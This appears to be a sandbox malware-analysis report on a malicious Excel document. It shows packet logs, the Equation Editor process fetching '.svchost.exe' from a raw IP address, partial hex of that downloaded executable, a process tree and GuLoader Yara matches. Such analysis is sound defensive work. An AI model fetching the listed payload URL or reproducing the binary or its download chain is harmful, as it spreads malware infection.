Jul 14, 2021 16:55:37.686918020 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.686944008 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.686975002 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.686997890 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.687021971 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.687079906 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.687225103 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.692516088 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.692581892 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.692939043 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.692970991 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.692997932 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.693011045 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.693018913 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.693056107 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.705852032 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.705914021 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.705925941 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.705954075 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.705981016 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.706042051 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.706583977 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.706639051 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.706701994 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.706726074 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.706741095 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.706757069 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.706794977 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.706816912 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.706830025 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.706845999 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720288992 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720345020 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720396042 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720439911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720490932 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720505953 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720530987 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720547915 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720585108 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720624924 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720642090 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720669985 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720705032 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720755100 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720767975 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720809937 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720840931 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720885992 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720906973 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.720952034 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.720976114 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721021891 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721046925 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721092939 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721111059 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721153975 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721168995 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721215010 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721226931 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721256971 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721281052 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721327066 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721337080 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721368074 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721393108 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721430063 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721446037 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721472979 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721502066 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721544027 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721559048 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721601009 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721633911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721682072 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721703053 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721750021 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721771002 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721827030 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721839905 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721874952 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.721910000 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721966982 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.721981049 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.722017050 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.722811937 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.945013046 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.945142031 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.945702076 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.945776939 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.945847034 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.945868015 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.945885897 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.945960045 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.945975065 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.945990086 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.946007013 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.946022987 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.946108103 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.946974993 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.947086096 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.947626114 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.947690964 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.947761059 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.947777987 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.947832108 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.950160980 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.962481022 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.962589979 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.962702036 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.962743998 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.962759972 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.962886095 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.963561058 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.963573933 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.963586092 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.963902950 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.965174913 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.978815079 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.978841066 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.978924990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979420900 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979432106 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979485035 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979497910 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979523897 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979651928 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979790926 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979866028 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979880095 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979892015 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979903936 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979918003 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979929924 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979942083 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.979989052 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.980058908 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.980072021 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.980171919 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.980329990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.981065035 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.981069088 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.981092930 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.981112003 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.981128931 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.981142044 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.981151104 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 14, 2021 16:55:37.981162071 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.981174946 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.981189966 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:37.984982967 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 14, 2021 16:55:38.702146053 CEST	49165	80	192.168.2.22	180.214.239.39

HTTP Request Dependency Graph

180.214.239.39

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	180.214.239.39	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 14, 2021 16:55:36.154084921 CEST	0	OUT	GET /port/.svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 180.214.239.39 Connection: Keep-Alive
Jul 14, 2021 16:55:36.409609079 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 14 Jul 2021 14:55:35 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT ETag: "41470-5c7043f493d18" Accept-Ranges: bytes Content-Length: 267376 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPELFR`pp@d(zX ( .text0Y` `.datapp@.rsrcz@@IMSVBVM60.DLL
Jul 14, 2021 16:55:36.409646034 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 14, 2021 16:55:36.409670115 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 14, 2021 16:55:36.409693003 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 14, 2021 16:55:36.664187908 CEST	7	IN	Data Raw: 74 10 40 00 ff 25 2c 10 40 00 ff 25 98 10 40 00 ff 25 44 10 40 00 ff 25 f8 10 40 00 ff 25 a4 10 40 00 ff 25 00 11 40 00 ff 25 24 10 40 00 ff 25 84 10 40 00 ff 25 5c 10 40 00 ff 25 e0 10 40 00 ff 25 dc 10 40 00 ff 25 e8 10 40 00 ff 25 48 10 40 00 Data Ascii: t@%,@%@%D@%@%@%@%$@%@%\@%@%@%@%H@%@%0@%@%@%T@%@%@%@%@%@%@%@%@%@%8@%@%P@%@%p@%@%@hC080R
Jul 14, 2021 16:55:36.664213896 CEST	8	IN	Data Raw: bb bb bb bb b0 00 00 0b bb bb bb bb bb bb b0 00 00 00 00 00 00 00 bb bb bb bb bb bb b0 00 00 0b bb bb bb bb bb bb b0 00 00 00 00 00 00 00 bb bb bb bb bb bb b0 00 00 0b bb bb bb bb bb bb b0 00 00 00 00 00 00 00 bb bb bb bb bb bb b0 00 00 0b bb bb Data Ascii:
Jul 14, 2021 16:55:36.664227009 CEST	10	IN	Data Raw: bb bb bb 00 00 8b bb bb bb bb 00 00 00 00 0b bb bb bb bb 00 00 0b bb bb bb bb 00 00 00 00 0b bb bb bb b8 00 00 0b bb bb bb bb 00 00 00 00 0b bb bb bb b0 00 00 08 bb bb bb bb 00 00 00 00 0b bb bb bb b0 00 00 00 bb bb bb bb 00 00 00 00 0b bb bb bb Data Ascii: ;7x?
Jul 14, 2021 16:55:36.664238930 CEST	11	IN	Data Raw: f7 00 1c cf f6 00 13 d0 f6 00 15 d1 f6 00 19 d1 f7 00 1d d1 f7 00 1b d4 f7 00 1e d1 f8 00 20 c2 e6 00 27 c5 e7 00 28 c5 e7 00 26 c5 e8 00 30 c7 e8 00 36 c9 e9 00 36 cc ec 00 23 d3 eb 00 3d da e3 00 21 ce f0 00 26 cf f3 00 22 d1 f7 00 26 d1 f7 00 Data Ascii: '(&066#=!&"&.!'!$)*-),6052526=9<;=>FHLJRUZ^FBEMXZ^WX^
Jul 14, 2021 16:55:36.664853096 CEST	12	IN	Data Raw: 00 00 00 00 00 00 00 4b 4b 4b 4b 4b 4b 4b 4b 4b 45 25 22 00 00 00 00 00 00 00 00 00 00 64 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b 2b 18 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 4b 4b 4b 4b 4b 4b 4b 4b 4b 2b 18 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 4b 4b Data Ascii: KKKKKKKKKE%"dKKKKKKKKKK+OKKKKKKKKK+KKKKKKKKKKK%dKKKKKKKKK4]sKKKKKKKKKKE$8kKKKKKKKKKE%OKKKKKKKKKK4]KKKKKKKKKK+KKKKKKKKKKK-o
Jul 14, 2021 16:55:36.664872885 CEST	14	IN	Data Raw: 17 00 00 00 00 00 00 00 00 00 00 00 91 0f 10 04 05 1b 79 79 79 51 25 22 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 79 79 79 79 79 79 79 79 34 1e 00 00 00 00 00 00 00 00 00 00 00 0e 06 12 b2 06 01 3f 79 79 2b 18 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: yyyQ%"yyyyyyyyy4?yy+Z%"EbEnQ$;4%:L
Jul 14, 2021 16:55:36.664917946 CEST	15	IN	Data Raw: 61 ea fc 00 65 eb fc 00 69 ec fc 00 73 e3 f7 00 73 e3 fb 00 76 e4 fb 00 78 e3 fb 00 7e e5 fb 00 7e eb fc 00 7b ee fc 00 7f ee fc 00 9c d8 bd 00 b2 e2 ce 00 b5 e3 cf 00 b8 e4 d1 00 89 e7 fc 00 83 ee fc 00 8d e8 fc 00 8a ee fc 00 99 ed f4 00 9c ee Data Ascii: aeissvx~~{

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2668 Parent PID: 584

General

Start time:	16:54:44
Start date:	14/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f820000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3056 Parent PID: 584

General

Start time:	16:55:06
Start date:	14/07/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2552 Parent PID: 3056

General

Start time:	16:55:09
Start date:	14/07/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	267376 bytes
MD5 hash:	FCFB0EC70F1419EDE8A534CC95CB61E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus matches:	Detection: 7%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2552 Parent PID: 3056 vbc.exeCOMMON

Executed Functions

Function 002A54E7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 161memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 002A56A2

Strings

y, xrefs: 002A57BB

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: y
API String ID: 2167126740-4225443349
Opcode ID: ccb9250a56514e3bcf147866c2b53727f3f21d783a92aff79db98ba1b2535767
Instruction ID: 4a165d19c11b1d5bc92d45f3db69ef88b690c9cdba7212acfd78bf46ad6ac654
Opcode Fuzzy Hash: ccb9250a56514e3bcf147866c2b53727f3f21d783a92aff79db98ba1b2535767
Instruction Fuzzy Hash: 1B518836A0934A8FEB319F748C457DB3BA1EF0A750F88052DDC89DB240D7758A80CB52

Uniqueness

Uniqueness Score: -1.00%

Function 002A55AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 002A56A2

Strings

y, xrefs: 002A57BB

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: y
API String ID: 2167126740-4225443349
Opcode ID: a5341afa1f59408f94a8a9e1ce93185e6b60ab566ed768acb8133b4381641583
Instruction ID: 69fe1e688ab5ebae41186b30b873f663d825e6035e4abfddb5365852f38b9ef6
Opcode Fuzzy Hash: a5341afa1f59408f94a8a9e1ce93185e6b60ab566ed768acb8133b4381641583
Instruction Fuzzy Hash: 1841633465938A8FEB31AF308C557E97FA1EF06394F58456DDCC58B252D7308A80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 004335E4, Relevance: 216.5, APIs: 116, Strings: 7, Instructions: 1225COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433730
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043374B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CE8,00000138), ref: 0043376D
__vbaFreeObj.MSVBVM60(00000000,00000000,00432CE8,00000138), ref: 00433778
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433790
__vbaObjSet.MSVBVM60(?,00000000), ref: 004337AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432CF8,000001C8), ref: 004337F9
__vbaFreeObj.MSVBVM60(00000000,?,00432CF8,000001C8), ref: 00433804
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 0043381C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433837
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000098), ref: 00433861
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433880
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043389B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000130), ref: 004338C0
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004338D6
__vbaStrVarMove.MSVBVM60(00000000), ref: 004338DF
